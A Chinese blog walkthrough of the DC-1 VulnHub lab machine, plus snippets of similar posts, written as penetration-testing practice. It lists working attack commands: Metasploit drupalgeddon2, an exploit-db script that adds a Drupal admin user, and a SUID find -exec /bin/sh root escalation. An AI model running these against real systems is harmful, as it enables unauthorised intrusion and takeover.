初试DC-1靶机渗透

最新推荐文章于 2023-06-29 22:24:36 发布
最新推荐文章于 2023-06-29 22:24:36 发布
阅读量659 收藏 2
点赞数
文章标签: linux 信息安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kimoro_x/article/details/105622031
版权

1.下载DC-1靶机

2.将DC-1.ova导入到VirtualBox中(具体流程不再赘述)

3.将靶机和kali(我的是在VMware下的)设置在同一网段下(具体步骤可参考此链接

4.用ifconfig查看本机IP
在这里插入图片描述
5.用netdiscover -r ip/netmask来探测靶场IP
在这里插入图片描述
6.经测试192.168.56.101为目标靶机ip,于是我们可以使用nmap -sV 192.168.56.101来挖掘开放的服务信息
在这里插入图片描述
7.对于开放http服务的端口,可以采用"http://ip:port/"的形式访问(如下图所示)
在这里插入图片描述
8.通过上述操作发现仅仅是个Drupal网站,于是我们可以使用dirb http://192.168.56.101:80来对这个服务的隐藏文件进行探测
在这里插入图片描述
9.发现这个robots文件后我们通过浏览器去访问一下,发现UPGRADE.txt,访问之后可以得到drupal的模糊版本信息
在这里插入图片描述
10.接下来我们可以使用如下命令git clone https://github.com/Dionach/CMSmap.git安装CMSmap这个软件同时获取drupal版本(python cmsmap.py http://192.168.56.101)
在这里插入图片描述
11.输入msfconsolesearch drupal来寻找漏洞,经过多次测试后最终选定drupalgeddon2为目标
在这里插入图片描述
12.输入use exploit/unix/webapp/drupal_drupalgeddon2命令后如下图所示进行设置
在这里插入图片描述
13.成功之后输入ls,这时我们成功发现第一个flag,接下来我们尝试打开它,输入cat flag1.txt
在这里插入图片描述
在这里插入图片描述
14.这是在提示我们去寻找CMS配置文件,分别执行cd sites/default/cat settings.php指令得到flag2,与此同时我们还得到了mysql数据库的一组用户名和密码,而且它还提醒我们暴力破解和字典攻击不是唯一的破解方法,这里应该是告诉我们不要用这两种方法

在这里插入图片描述
15.这里我们先尝试一下用mysql直接登录,发现没有结果显示,应该是shell的问题,于是我们可以使用python -c 'import pty; pty.spawn("/bin/bash")'命令来获取shell外壳
在这里插入图片描述
在这里插入图片描述
16.此时再登录就顺利进去了,这时候我们再通过show databases发现了drupaldb,查看users表,使用select *from users;命令,这时我们就得到了加密后的密码
在这里插入图片描述
17.破解密码是借鉴了别人的方法,另开一个msf,输入searchsploit drupal命令,选则如图所示的攻击脚本
在这里插入图片描述
18.通过输入如下命令使用此脚本来增加admin权限的用户
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.56.101 -u admin1 -p admin1,成功登录网站并且找到flag3

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
19.flag3有几个明显的关键词:perms、find、passwd、-exec、shadow,我第一反应是要打开/etc/passwd看看,发现了flag4的位置了,马上cd过去并用cat打开
在这里插入图片描述
在这里插入图片描述
20.此时flag4是在提示我们去根目录看看,毫无意外,直接cd过去被拒绝了,此时再联想前面的提示,使用find来提权find ./ aaa -exec '/bin/sh' \;,至此所有的flag都找出来了
在这里插入图片描述

参考:
Vulnhub靶机实战——DC-1

kimoro_x
关注
DC-1靶机渗透详细过程(附靶机连接)
bwt_D的博客
05-19 801
查看本机的ip地址 使用nmap进行ip地址扫描,确定靶机的IP nmap -sP 192.168.159.1/24 对其进行详细扫描 nmap -A 192.168.159.140 -p 1-65535 80端口开放,直接使用浏览器访问 使用MSF搜索该网页模板存在的漏洞 msfconsole search drupal 使用第四个攻击模块 use exploit/unix/webapp/drupal_drupalgeddon2 选择攻击载荷 set payload php/meterpreter
DC-1靶机渗透笔记
最新发布
qq_60600840的博客
08-08 262
DC-1靶机安全渗透靶机
DC-1靶机渗透学习
里丘~班诺的小屋
08-31 2806
一、靶机的环境搭配 攻击机(KALI):192.168.226.129 靶机(DC-1): 192.168.226.131(未知) 靶机地址:https://www.vulnhub.com/entry/dc-1,292/ 二、战前准备 要求:攻击机和靶机在同一网段下,使用NAT模式 1、找到kali的IP地址,用nmap扫描同一网段找到靶机的IP 一般扫描出来的在中间而129是kali的,所以可以确定的是靶机的地址是192.168...
线下靶机测试:hacknox-1
weixin_57567689的博客
08-30 692
对线下靶机进行测试
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2319
DC系列目前总共有9个靶机,本次靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
063 渗透测试实战,靶机 DC-1
鸡蛋炒鸡蛋
04-23 3034
文章目录一:准备阶段二:flag1三:flag2四:flag3五:flag4六:flag5 一:准备阶段 DC-1下载与安装 下载:点我 安装: 下载之后进行解压,得到.ova文件 右键选择VMware打开, 选择路径,导入虚拟机,若出现下图情况,先点击取消,然后把vmware正处于开启状态的虚拟机关闭或者选择挂起。再重新选择路劲,导入虚拟机,若还是出现下图内容,则点击重试即可。 安装完成 点击编辑虚拟机 二:flag1 三:flag2 四:flag3 五:flag4 六:flag5 ...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
【靶场实战】dc-1靶机 渗透测试
weixin_44023442的博客
04-05 1249
参考文章 DC-1 靶机安装及练习 一、搭建环境 搭建环境 下载地址:dc-1 加压后用VMware打开,配置网络适配器为NAT模式 注意:dc-1开机后会提示输入账号密码,这里可以不用管他。 开启kali虚拟机,同样的,配置网络适配器为NAT模式 测试环境 在kali终端输入:ifconfig,查看当前网段 可知,当前c段是 192.168.224.0 用nmap扫描整个c段,输入nmap -sP 192.168.224.0/24 很明显,192.168.224.129 就是dc-1的ip地址
DC-9 靶机渗透
Rex_Surprise的博客
05-10 388
DC-9 靶机渗透 1. 渗透过程 THE_END! DC-9 靶机渗透1. 渗透过程 初期脚本扫描 扫描结果 可以发现 ip地址为:192.168.0.114 ssh (但是ssh无法访问了) 和 http服务s 但是没有其他可用的信息 爆破一下目录 我这里用御剑爆破 输入url: http://192.168.0.114...
VulnHub-DC-1靶机渗透测试和相应的知识点总结
qq_45584159的博客
12-15 1443
文章目录前言一、探测目标主机的ip1.使用arp-scan -l 命令,来探测同一局域网内的存活主机。2.使用netdiscover -i eth0二、使用namp扫描目标主机的开放端口,并通过开放端口得到更多的信息三. .Metasploit漏洞利用msf的简单使用:术语:模块:基础指令:模块使用规则:msf中大多数命令:第一步.启动msf:第二步.搜索drupal可利用的漏洞第三步,采用最新的2018漏洞尝试攻击,配置参数第四步,反弹shell四. 进入数据库第一步.进入数据库 前言 这是我第一次使用
drupalgeddon2:没有metasploit的drupalgeddon2
04-06
drupalgeddon2 没有metasploit的drupalgeddon2。 python3脚本 用法:python3 drupalgeddon2.py <target>
DC-1靶机进行渗透测试
zll___的博客
03-11 1052
DC-1靶机进行渗透测试
DC-1完整的渗透测试过程
weixin_51097397的博客
06-29 1555
1.此次DC-1的渗透用到了如下几种工具的基础使用①namp②whatweb④hydra2.其中用到了python getshell的方法3.数据库的基本使用(增删改查)4.linux的基本命令,尤其是suid提权find的用法} \;这些基本的操作用法我非常不熟,需要经常练习去掌握。!!
Drupal靶机实战
yuan_boss的博客
06-27 367
​ 通过kalisuidsudo,定时任务等,实在没办法再从普通用户入手,拿到普通用户的权限之后再找线索。​ 但是,有的网站目录用户是没有find执行权限或者sudo命令,于是无法使用sudo提权或者suid提权,所以这个时候想进一步提权就需要先拿到普通用户的权限,由于进入网站目录之后可以查看权限,可以发现有个flag4普通用户,但是没有其他信息了,于是就可以尝试密码爆破,因为已经确定了用户名,密码如果强大的话,爆破成功只是时间问题。
vulnhub靶机DC-1渗透笔记
liver100day的博客
06-01 294
DC-1靶机渗透 靶机环境搭建: 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-1 IP地址 下载地址:https://www.vulnhub.com/entry/dc-1,292/ 渗透过程 1.信息收集 1.1 IP地址确认 netdiscover 可以确认目标靶机IP地址为 192.168.75.141 还可以使用 arp-scan -l 同样扫描出目标靶机IP地址 1.2 爆破端口信息 既然知道了靶机的IP地址,那就理所应当的扫描下端口啦 这里使用端口扫描神器
靶机渗透-Vulnhub-DC-1
dahege666的博客
01-12 181
下载地址:链接:https://pan.baidu.com/s/1_oBtOEVSu2VaRpjmsKSh-Q 提取码:ugo5 靶机DC1(VMware桥接) IP:192.168.88.115 攻击机:Kali(VMware桥接) IP:192.168..88.100 查看Kali IP地址 使用NMAP扫描网段,查看靶机IP地址,可以根据MAC地址判断哪个是靶机IP:192.168.88.115 然后使用nmap扫描靶机,进行信息收集,开发了22,80,111端...
[Vulnhub] DC-1
weixin_63231007的博客
07-06 716
目录信息搜集msf--Drupal漏洞利用SUID提权Drupal使用CVE2014-3704 添加管理员账号下载地址:DC: 1 ~ VulnHubnmap -sP 192.168.236.0/24 扫描一下靶机ip靶机ip:192.168.236.137nmap -A 192.168.236.137 扫描一下靶机开放哪些服务 访问 靶机ip 发现是用Drupal搭建的网页 他是存在一些漏洞可以被利用的。我们之前在Lampiao 靶机中进行了msf--Drupal漏洞利用。我们这里打开msfconsol
2021-12-16 综合靶机实验
夕阳的街道的博客
12-16 2904
一、实验题目:综合靶机实验 二、实验内容: 1.使用msf搜索可利用漏洞(drupal) 2. 寻找目标网站的配置文件 3.数据库管理员提权(更新管理员密码或者添加一个新用户) 4. suid提权的命令(nmap、vim、find、bash、more、less、nano、cp) 三、实验环境: 1.kali虚拟机:192.168.112.130 2. 靶机:192.168.112.138 四、实验步骤: 1.搜索存活靶机,输入命令: masscan 网段 -p 80 ..
DC-1详解(绝对的详细!)
学习!冲冲冲!
10-23 9251
DC-1靶机整个渗透过程(B站可以看小飞侠的视频真的好!) 将kali和DC-1的网络均设置为NAT模式 获取kali的IP地址 ifconfig 查看IP命令需要记住 扫描此IP段中存活的靶机IP arp-scan -l 根据靶机MAC地址来确认其IP地址 用masscan快速扫描DC-1开放的端口 masscan --rate10000 -p 1-65535 192.168.220.131 --rate10000 用来定义扫描速率 -p 1-65535 定义扫描从1-6553
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值